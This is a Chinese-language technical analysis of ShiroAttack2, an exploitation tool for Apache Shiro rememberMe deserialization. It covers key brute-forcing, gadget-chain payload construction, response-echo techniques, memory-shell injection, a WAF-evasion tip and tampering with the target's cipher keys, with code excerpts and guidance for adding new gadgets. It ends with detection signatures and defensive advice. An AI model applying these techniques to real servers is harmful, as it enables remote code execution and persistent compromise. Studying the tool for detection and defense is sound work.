ShiroAttack2工具原理深度分析与教学文档<\/h1>

1. 工具概述<\/h2>

ShiroAttack2是一款针对Apache Shiro框架漏洞利用的开源工具，主要用于：<\/p>

Shiro框架检测<\/li>
密钥爆破与验证<\/li>
利用链测试与利用<\/li>
内存马注入<\/li>

Shiro密钥修改<\/li> <\/ul>

2. 核心功能原理分析<\/h2>

2.1 Shiro框架检测机制<\/h3>

检测流程<\/strong>：<\/p>

发送带有rememberMe=1<\/code>的Cookie请求<\/li>
检查响应是否包含=deleteMe<\/code><\/li>
如果无响应，则发送随机10位数的rememberMe值再次检测<\/li> <\/ol> 关键代码<\/strong>：<\/p> public<\/span> boolean<\/span> checkIsShiro<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> HashMap<<\/span>String,<\/span> String><\/span> header =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> header.<\/span>put<\/span>(<\/span>"Cookie"<\/span>,<\/span> this<\/span>.<\/span>shiroKeyWord<\/span> +<\/span> "=1"<\/span>);<\/span> <\/span><\/span> String result =<\/span> this<\/span>.<\/span>headerHttpRequest<\/span>(<\/span>header);<\/span> <\/span><\/span> flag =<\/span> result.<\/span>contains<\/span>(<\/span>"=deleteMe"<\/span>);<\/span> <\/span><\/span> if<\/span> (!<\/span>flag)<\/span> {<\/span> <\/span><\/span> HashMap<<\/span>String,<\/span> String><\/span> header1 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> header1.<\/span>put<\/span>(<\/span>"Cookie"<\/span>,<\/span> this<\/span>.<\/span>shiroKeyWord<\/span> +<\/span> "="<\/span> +<\/span> AttackService.<\/span>getRandomString<\/span>(<\/span>10<\/span>));<\/span> <\/span><\/span> String result1 =<\/span> this<\/span>.<\/span>headerHttpRequest<\/span>(<\/span>header1);<\/span> <\/span><\/span> flag =<\/span> result1.<\/span>contains<\/span>(<\/span>"=deleteMe"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception var4)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> return<\/span> flag;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>WAF绕过技巧<\/strong>：<\/p> 使用随机rememberMe值而非固定值1<\/code>，避免被特征检测<\/li> <\/ul> 2.2 密钥验证与爆破<\/h3> 2.2.1 指定密钥验证<\/h4> 直接使用用户提供的密钥进行验证：<\/p> this<\/span>.<\/span>attackService<\/span>.<\/span>simpleKeyCrack<\/span>(<\/span>spcShiroKey);<\/span> <\/span><\/span><\/code><\/pre>2.2.2 密钥爆破<\/h4> 遍历内置密钥字典进行爆破：<\/p> this<\/span>.<\/span>attackService<\/span>.<\/span>keysCrack<\/span>();<\/span> <\/span><\/span><\/code><\/pre>2.3 利用链爆破机制<\/h3> 工作流程<\/strong>：<\/p> 组合利用链和回显方式（如"CC链:Tomcat回显"）<\/li> 对每种组合进行测试<\/li> 通过特定特征判断利用是否成功<\/li> <\/ol> 关键代码<\/strong>：<\/p> List<<\/span>String><\/span> targets =<\/span> this<\/span>.<\/span>attackService<\/span>.<\/span>generateGadgetEcho<\/span>(<\/span>this<\/span>.<\/span>gadgetOpt<\/span>.<\/span>getItems<\/span>(),<\/span> this<\/span>.<\/span>echoOpt<\/span>.<\/span>getItems<\/span>());<\/span> <\/span><\/span>for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> targets.<\/span>size<\/span>();<\/span> ++<\/span>i)<\/span> {<\/span> <\/span><\/span> String[]<\/span> t =<\/span> targets.<\/span>get<\/span>(<\/span>i).<\/span>split<\/span>(<\/span>":"<\/span>);<\/span> <\/span><\/span> String gadget =<\/span> t[<\/span>0<\/span>];<\/span> <\/span><\/span> String echo =<\/span> t[<\/span>1<\/span>];<\/span> <\/span><\/span> flag =<\/span> this<\/span>.<\/span>attackService<\/span>.<\/span>gadgetCrack<\/span>(<\/span>gadget,<\/span> echo,<\/span> spcShiroKey);<\/span> <\/span><\/span> if<\/span> (<\/span>flag)<\/span> break<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用链测试特征<\/strong>：<\/p> 请求头中包含Ctmd: 08fb41620aa4c498a1f2ef09bbc1183c<\/code><\/li> 响应中包含相同特征值表示利用成功<\/li> <\/ul> 2.4 恶意对象生成流程<\/h3> 获取利用链Class对象<\/strong>：<\/p> Class<?<\/span> extends<\/span> ObjectPayload><\/span> gadgetClazz =<\/span> Utils.<\/span>getPayloadClass<\/span>(<\/span>gadgetOpt);<\/span> <\/span><\/span>ObjectPayload<?><\/span> gadgetPayload =<\/span> gadgetClazz.<\/span>newInstance<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建TemplatesImpl对象<\/strong>：<\/p> Object template =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>echoOpt);<\/span> <\/span><\/span><\/code><\/pre><\/li> 生成恶意对象<\/strong>：<\/p> Object chainObject =<\/span> gadgetPayload.<\/span>getObject<\/span>(<\/span>template);<\/span> <\/span><\/span><\/code><\/pre><\/li> AES加密处理<\/strong>：<\/p> String rememberMe =<\/span> shiro.<\/span>sendpayload<\/span>(<\/span>chainObject,<\/span> this<\/span>.<\/span>shiroKeyWord<\/span>,<\/span> spcShiroKey);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2.5 回显方式分析<\/h3> 2.5.1 Tomcat回显<\/h4> 实现方式<\/strong>：<\/p> 从ClientPoller<\/code>线程获取NioEndPoint<\/code>对象<\/li> 获取RequestInfo<\/code>对象<\/li> 最终获取Response对象<\/li> <\/ol> 关键代码路径<\/strong>：<\/p> Thread.currentThread() → ThreadGroup → ClientPoller线程 → target(Poller对象) → this$0(NioEndPoint) → handler → global(RequestInfo) → response <\/code><\/pre> 2.5.2 Spring回显<\/h4> 通过RequestContextHolder<\/code>获取：<\/p> RequestAttributes requestAttributes =<\/span> RequestContextHolder.<\/span>getRequestAttributes<\/span>();<\/span> <\/span><\/span>HttpServletResponse response =<\/span> ((<\/span>ServletRequestAttributes)<\/span>requestAttributes).<\/span>getResponse<\/span>();<\/span> <\/span><\/span><\/code><\/pre>2.5.3 通用回显(AllEcho)<\/h4> 实现原理<\/strong>：<\/p> 从当前线程开始深度遍历对象属性<\/li> 查找HttpServletRequest<\/code>和HttpServletResponse<\/code>对象<\/li> 默认遍历深度50层<\/li> <\/ol> 关键代码<\/strong>：<\/p> private<\/span> static<\/span> void<\/span> Find<\/span>(<\/span>Object start,<\/span> int<\/span> depth){<\/span> <\/span><\/span> if<\/span>(<\/span>depth ><\/span> max_depth ||<\/span> (<\/span>req!=<\/span>null<\/span> &&<\/span> resp!=<\/span>null<\/span>))<\/span> return<\/span>;<\/span> <\/span><\/span> for<\/span> (<\/span>Field declaredField :<\/span> start.<\/span>getClass<\/span>().<\/span>getDeclaredFields<\/span>())<\/span> {<\/span> <\/span><\/span> if<\/span>(!<\/span>Modifier.<\/span>isStatic<\/span>(<\/span>declaredField.<\/span>getModifiers<\/span>())){<\/span> <\/span><\/span> Object obj =<\/span> declaredField.<\/span>get<\/span>(<\/span>start);<\/span> <\/span><\/span> if<\/span>(<\/span>obj !=<\/span> null<\/span> &&<\/span> !<\/span>obj.<\/span>getClass<\/span>().<\/span>isArray<\/span>()){<\/span> <\/span><\/span> proc(<\/span>obj,<\/span> depth);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.6 内存马注入机制<\/h3> 实现特点<\/strong>：<\/p> 将内存马代码与注入逻辑分离<\/li> 通过POST参数dy<\/code>传递实际内存马字节码<\/li> 使用反射动态加载和执行<\/li> <\/ol> 注入流程<\/strong>：<\/p> 生成包含InjectMemTool<\/code>的rememberMe<\/li> 通过请求头传递密码(p<\/code>)和路径(path<\/code>)<\/li> 通过POST body传递base64编码的内存马字节码(dy<\/code>)<\/li> 服务端动态加载并执行内存马<\/li> <\/ol> 关键代码<\/strong>：<\/p> String b64Bytecode =<\/span> MemBytes.<\/span>getBytes<\/span>(<\/span>memShellType);<\/span> <\/span><\/span>String postString =<\/span> "dy="<\/span> +<\/span> b64Bytecode;<\/span> <\/span><\/span>String result =<\/span> this<\/span>.<\/span>bodyHttpRequest<\/span>(<\/span>header,<\/span> postString);<\/span> <\/span><\/span><\/code><\/pre>2.7 Shiro密钥修改功能<\/h3> 实现原理<\/strong>：<\/p> 遍历Tomcat的filterConfigs<\/li> 找到ShiroFilterFactoryBean<\/code>实例<\/li> 获取RememberMeManager<\/code><\/li> 反射修改加密\/解密密钥<\/li> <\/ol> 关键代码<\/strong>：<\/p> \/\/ 获取rememberMeManager <\/span><\/span><\/span><\/span>field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"rememberMeManager"<\/span>);<\/span> <\/span><\/span>obj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 修改加密密钥 <\/span><\/span><\/span><\/span>Method setEncryptionCipherKey =<\/span> obj.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>()<\/span> <\/span><\/span> .<\/span>getDeclaredMethod<\/span>(<\/span>"setEncryptionCipherKey"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>);<\/span> <\/span><\/span>setEncryptionCipherKey.<\/span>invoke<\/span>(<\/span>obj,<\/span> new<\/span> Object[]{<\/span>bytes});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 修改解密密钥 <\/span><\/span><\/span><\/span>Method setDecryptionCipherKey =<\/span> obj.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>()<\/span> <\/span><\/span> .<\/span>getDeclaredMethod<\/span>(<\/span>"setDecryptionCipherKey"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>);<\/span> <\/span><\/span>setDecryptionCipherKey.<\/span>invoke<\/span>(<\/span>obj,<\/span> new<\/span> Object[]{<\/span>bytes});<\/span> <\/span><\/span><\/code><\/pre>3. 防御检测特征<\/h2> 框架检测阶段<\/strong>：<\/p> 请求包含rememberMe=1<\/code>或随机rememberMe值<\/li> 检查=deleteMe<\/code>响应<\/li> <\/ul> <\/li> 利用链测试阶段<\/strong>：<\/p> 请求头包含Ctmd: 08fb41620aa4c498a1f2ef09bbc1183c<\/code><\/li> 响应检查相同特征值<\/li> <\/ul> <\/li> 内存马注入阶段<\/strong>：<\/p> 请求包含p<\/code>和path<\/code>参数<\/li> POST请求包含dy<\/code>参数<\/li> <\/ul> <\/li> <\/ol> 4. 扩展开发指南<\/h2> 4.1 添加新利用链<\/h3> 实现ObjectPayload<\/code>接口：<\/p> public<\/span> class<\/span> NewGadget<\/span> implements<\/span> ObjectPayload<<\/span>Object><\/span> {<\/span> <\/span><\/span> public<\/span> Object getObject<\/span>(<\/span>Object template)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造恶意对象 <\/span><\/span><\/span><\/span> return<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>template);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 放置在com.summersec.attack.deser.payloads<\/code>包下<\/p> <\/li> <\/ol> 4.2 添加新回显方式<\/h3> 实现EchoPayload<\/code>接口：<\/p> public<\/span> class<\/span> NewEcho<\/span> implements<\/span> EchoPayload<<\/span>Object><\/span> {<\/span> <\/span><\/span> public<\/span> CtClass genPayload<\/span>(<\/span>ClassPool pool)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> CtClass clazz =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"NewEcho"<\/span>);<\/span> <\/span><\/span> \/\/ 实现回显逻辑 <\/span><\/span><\/span><\/span> return<\/span> clazz;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 确保生成的类继承AbstractTranslet<\/code><\/p> <\/li> <\/ol> 5. 工具限制与注意事项<\/h2> 利用链限制<\/strong>：<\/p> 主要支持CC链和Beanutils链<\/li> 需要封装为TemplatesImpl<\/code>对象<\/li> <\/ul> <\/li> 内存马限制<\/strong>：<\/p> 注入代码长度受HTTP头大小限制<\/li> 需要分离注入逻辑和实际内存马代码<\/li> <\/ul> <\/li> 密钥修改限制<\/strong>：<\/p> 依赖ShiroFilterFactoryBean<\/code>的默认命名<\/li> 在自定义命名场景下可能失效<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> 监控rememberMe<\/code>参数异常值<\/li> 拦截包含Ctmd<\/code>头的请求<\/li> 限制POST参数dy<\/code>的访问<\/li> <\/ul> <\/li> <\/ol>